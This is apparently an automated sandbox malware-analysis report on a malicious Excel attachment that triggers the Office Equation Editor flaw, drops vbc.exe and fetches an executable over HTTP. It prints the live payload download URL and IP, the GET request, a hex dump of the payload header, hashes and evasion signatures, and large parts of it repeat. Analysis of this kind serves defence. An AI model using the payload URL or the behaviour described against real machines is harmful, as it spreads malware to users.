Windows Analysis Report
_FM_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name:	_FM_BUSAN_HOCHIMINH_.xlsx
Analysis ID:	573118
MD5:	9d7bf0f2fbb81660c8b91c2a323fde4e
SHA1:	7adf1d60fd08b3accd3a8e58fbdcc674bd1b02ee
SHA256:	d60188bc3e17e3fe9a8353a5eb4b791316968f3c1cea1e4e88138718efec0611
Tags:	VelvetSweatshopxlsx
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Multi AV Scanner detection for domain / URL

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Drops PE files to the user root directory

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Downloads executable code via HTTP

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: _FM_BUSAN_HOCHIMINH_.xlsx	Virustotal: Detection: 38%			Perma Link
Source: _FM_BUSAN_HOCHIMINH_.xlsx	ReversingLabs: Detection: 35%

Multi AV Scanner detection for domain / URL

Source: http://198.46.132.195/ProgramFile/.win32.exe

Virustotal: Detection: 6%

Perma Link

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 66MB

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.46.132.195 198.46.132.195

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Feb 2022 08:11:23 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 27 Jan 2022 15:00:29 GMTETag: "10b990-5d69194428b49"Accept-Ranges: bytesContent-Length: 1096080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 be 3e 87 5d 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d8 08 00 00 a0 07 00 00 00 00 00 96 fe 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 11 00 00 04 00 00 8e 81 11 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 35 0b 00 b4 00 00 00 00 d0 0b 00 30 b0 04 00 00 00 00 00 00 00 00 00 00 7c 10 00 90 3d 00 00 00 90 10 00 1c 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a9 09 00 5c 00 00 00 00 00 00 00 00 00 00 00 2c 3b 0b 00 28 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5e d6 08 00 00 10 00 00 00 d8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 6c 02 00 00 f0 08 00 00 6e 02 00 00 dc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 4e 00 00 00 60 0b 00 00 0a 00 00 00 4a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 b0 0b 00 00 02 00 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 b4 00 00 00 00 c0 0b 00 00 02 00 00 00 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 30 b0 04 00 00 d0 0b 00 00 b2 04 00 00 58 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 90 10 00 00 72 00 00 00 0a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /ProgramFile/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195

Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: vbc.exe, 00000004.00000000.473834838.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.698040978.0000000000230000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.698210832.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C9FA8A.emf

Jump to behavior

Source: global traffic

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0140092D	4_2_0140092D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0141E13E	4_2_0141E13E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A3DF6	4_2_013A3DF6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_014198F0	4_2_014198F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01400880	4_2_01400880
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013E574E	4_2_013E574E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A57BF	4_2_013A57BF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01405792	4_2_01405792
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A3606	4_2_013A3606
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01404E15	4_2_01404E15
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A46DE	4_2_013A46DE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01405EB0	4_2_01405EB0

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 0140BDBF appears 61 times

PE file contains strange resources

Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe 736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: _FM_BUSAN_HOCHIMINH_.xlsx	Virustotal: Detection: 38%
Source: _FM_BUSAN_HOCHIMINH_.xlsx	ReversingLabs: Detection: 35%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$_FM_BUSAN_HOCHIMINH_.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRFA55.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.expl.winXLSX@4/20@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

Window detected: Number of UI elements: 21

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_014004C6 push ecx; ret

4_2_014004D9

PE file contains sections with non-standard names

Source: .win32[1].exe.2.dr	Static PE information: section name: .00cfg
Source: vbc.exe.2.dr	Static PE information: section name: .00cfg

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952

Thread sleep time: -240000s >= -30000s

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_014119B9

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0140A9D6 mov eax, dword ptr fs:[00000030h]

4_2_0140A9D6

Source: C:\Users\Public\vbc.exe	Code function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_014119B9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013FFC48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_013FFC48

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_01400125 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_01400125

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0141C3A6 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

4_2_0141C3A6

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.46.132.195	unknown	United States		36352	AS-COLOCROSSINGUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.46.132.195/ProgramFile/.win32.exe	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: _FM_BUSAN_HOCHIMINH_.xlsx	Virustotal: Detection: 38%			Perma Link
Source: _FM_BUSAN_HOCHIMINH_.xlsx	ReversingLabs: Detection: 35%

Multi AV Scanner detection for domain / URL

Source: http://198.46.132.195/ProgramFile/.win32.exe

Virustotal: Detection: 6%

Perma Link

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 66MB

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.46.132.195 198.46.132.195

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.132.195

Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
